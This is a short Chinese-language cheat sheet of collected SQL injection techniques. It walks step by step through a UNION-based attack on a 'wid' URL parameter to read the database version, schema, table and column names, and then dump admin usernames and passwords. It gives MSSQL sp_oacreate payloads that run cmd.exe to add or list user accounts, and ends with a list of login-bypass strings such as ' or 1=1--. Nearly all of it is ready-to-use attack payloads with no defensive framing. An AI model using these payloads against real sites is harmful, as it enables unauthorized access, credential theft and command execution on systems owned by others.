搜集的注入技巧
1 判断版本news_info.php?wid=-1/**/union/**/select/**/1,user(),3,4,version(),6,7,8,9,10,11,12,13,14,15/*
2 数据库名字info.php?wid=-1/**/union/**/select/** /1,SCHEMA_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15 from/**/information_schema.SCHEMATA limit 17,1/*
3表名 6进制为上面结果
info.php?wid=-1/**/union/**/select/**/1,TABLE_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=0×77656262617365/**/limit/**/11,1
4 tg_adminuser十六进制编码为0x74675F61646D696E75736572,依次查找该表里面的字段名,如图4,图5
xx.com/news_info.php?wid=-1/**/union/**/select/**/1,COLUMN_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=0x74675F61646D696E75736572/**/limit/**/1,1
5数据库,表名,字段我们都知道了,查出密码就很简单了,如图六
xx.com/news_info.php?wid=-1/**/union/**/select/**/1,username,3,4,password,6,7,8,9,10,11,12,13,14,15/**/from/**/webbase.tg_adminuse
DECLARE @S int EXEC sp_oacreate [wscript.shell],@s out EXEC sp_oamethod @s,[run],NULL,[cmd.exe /c net user guest testa!@#$] –
DECLARE @shell INT EXEC SP_OAcreate ‘wscript.shell’,@shell OUTPUT EXEC SP_OAMETHOD @shell,’run’,null, ‘C:\WINNT\system32\command.com /c net user’–
http://www.wjs168.com
绕过登录验证进入后台的方法整理:
1) ‘ or”=’
2) ‘ or 1=1–
3) ‘ or ‘a’='a–
4) ‘or’='or’
5) ” or 1=1–
6)or 1=1–
7) or ‘a=’a
8)” or “a”=”a
9) ‘) or (‘a’='a
10) “) or (“a”=”a
11) ) or (1=1
12) ‘or”=’
13) 人气%’ and 1=1 and ‘%’=’
1′or’1′=’1